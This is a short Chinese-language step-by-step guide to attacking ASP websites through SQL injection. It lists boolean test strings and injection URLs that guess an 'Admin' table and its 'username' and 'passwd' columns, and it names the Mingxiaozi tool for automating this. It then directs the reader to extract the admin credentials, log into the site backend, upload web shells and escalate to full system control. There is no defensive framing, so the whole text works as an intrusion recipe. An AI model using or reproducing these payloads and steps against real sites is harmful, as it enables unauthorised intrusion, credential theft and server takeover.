1、利用明小子工具判断是否存在SQL注入漏洞或者利用1=1或1=2 或 ' and '1'='1 或' and '1'='2来判定带参数URL是否存在注入漏洞
2、如果存在注入漏洞,则判断数据库名和表名
明小子工具利用工具判断数据库类型然后手工或者自动进行下面的判断
判断表名:.asp?ID=2355 and (Select count(*) from Admin)>0 修改颜色部分直到网页返回正常为止,网页返回正常说明表名正确
判断表的列名:
asp?ID=2355 and (Select count(username) from Admin)>0 修改颜色部分直到网页返回正常为止,网页返回正常说明表名正确
asp?ID=2355 and (Select count(passwd) from Admin)>0 修改颜色部分直到网页返回正常为止,网页返回正常说明表名正确
3、利用工具获取上述列名的内容即用户名和密码,之后登陆到后台地址
4、上传小马和大马提升权限获取最终的系统控制权限